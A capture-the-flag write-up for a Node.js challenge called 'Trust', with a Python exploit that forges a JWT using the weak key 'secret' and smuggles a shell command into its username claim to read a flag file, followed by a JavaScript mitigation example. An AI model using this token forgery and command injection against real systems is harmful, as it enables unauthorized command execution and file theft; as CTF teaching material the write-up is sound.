# Trust

## [Project](https://github.com/Diefunction/tcc-ctf/tree/main/trust)

#### Structure

```
trust
├── src/
│   ├── controllers/
│   │   └── users.js
│   ├── middlewares/
│   │   ├── authenticate.js
│   │   └── error.js
│   ├── routes/
│   │   └── users.js
│   ├── app.js
│   ├── package.json
│   └── flag.txt
├── .dockerignore
└── Dockerfile
```

## Solution

Install pip

```
sudo apt install python3-pip
```

Install pyjwt and requests

```
python3 -m pip install pyjwt requests
```

Exploit

```python
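import jwt
from requests import get

host = '127.0.0.1'
port = '8000'

# The username claim carries shell metacharacters instead of a plain name.
payload = {
    'username': ' > /dev/null && cat /usr/src/app/flag.txt'
}
# Key used to sign the token (PyJWT defaults to HS256).
key = 'secret'

# The signed token is sent as the bare Authorization header value.
headers = {'Authorization': jwt.encode(payload=payload, key=key)}

flag = get(f'http://{host}:{port}/api/user/system/exist', headers=headers).text
print(flag)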
```

Run the script

```
python3 exploit.py
```

Output

```
{"message":"username exists","output":"TCC{34$Y_c0mmAND_1nJ3c710n}"}
```
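
The fix for this class of bug, as an added example that is not the project's code (the controller source is not shown on this page). It assumes the handler checks a system account by running `id <username>` with the token's `username` claim; `shellCommandLine`, `isValidUsername` and `argvSeenByChild` are hypothetical names.

```javascript
// Added example, not the project's code. Assumption: the controller runs
// `id <username>` using the username claim taken from the verified JWT.
const { spawnSync } = require('node:child_process');

// Constructed sample: the username claim used in the solution above.
const CLAIM = ' > /dev/null && cat /usr/src/app/flag.txt';

// Weak pattern: the claim is concatenated into a string that a shell parses
// (what exec() or execSync() would receive). Built here, never executed.
function shellCommandLine(username) {
  return `id ${username}`; // a shell reads ">" and "&&" as operators
}

// Mitigation 1: allow-list the claim before it reaches any command.
// POSIX-style login names only: no spaces, no shell metacharacters.
const USERNAME_RE = /^[a-z_][a-z0-9_-]{0,31}$/;
function isValidUsername(username) {
  return typeof username === 'string' && USERNAME_RE.test(username);
}

// Mitigation 2: run the program without a shell, so the value arrives as
// exactly one argv element. The child is node itself echoing its arguments,
// which keeps the demo portable; a real handler would call
// spawnSync('id', ['--', username], { shell: false }) instead.
function argvSeenByChild(username) {
  const child = spawnSync(
    process.execPath,
    ['-e', 'process.stdout.write(JSON.stringify(process.argv.slice(1)))',
      '--', username],
    { shell: false, encoding: 'utf8' }
  );
  return JSON.parse(child.stdout);
}

console.log('shell string :', shellCommandLine(CLAIM));
console.log('valid name?  :', isValidUsername(CLAIM));
console.log('argv, no shell:', argvSeenByChild(CLAIM));
```

A signed token only proves who issued the claim, not that its value is safe to place in a command; a guessable signing key such as `secret` removes even that guarantee.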
